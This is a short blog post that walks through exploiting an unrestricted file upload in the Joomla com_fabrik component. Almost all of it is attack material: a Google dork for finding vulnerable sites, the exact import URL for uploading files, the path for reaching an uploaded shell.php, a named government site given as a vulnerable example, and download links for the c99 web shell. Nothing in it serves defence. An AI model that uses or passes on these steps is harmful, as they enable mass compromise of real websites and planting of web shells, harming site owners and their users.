Another one , :)

we had a recent post http://ustechnica.wordpress.com/category/security/joomla-jce-ecploit/ on one of the Joomla vulnerability.

Joomla’s com_fabrik component gives you the power to create forms and tables that run inside Joomla without requiring knowledge of mySQL and PHP. Then feed your data into Google Maps, Charts or an AJAX based calendar.

but it’s vulnerable :)

let’s hit the road,

1. Google Dork : inurl:index.php?option=com_fabrik

if you want to narrow down the search for .com domains or .com.au domains then just append “site:com.au” in above google dork.

Example: inurl:index.php?option=com_fabrik site:com.au (This will serach for com_fabrik vulnerability for .com.au websites)

2. once you have the list of websites,

replace with the link shown below,

http://www.example.com.au/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. you’ll get something like this and you can upload any file,

comfabrik

4. Now upload any file and once succeeded,

access link of  uploaded file,

http://www.example.com.au/media/shell.php (shell.php is the name of the uploaded file)

5. Example of the vulnerable sites,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1

6. you can download one of the below files and can upload through com_fabrik vulnerability,

http://www.2shared.com/file/6yFs_FG_/c99shell.html

http://pastebin.com/tfhHcPE0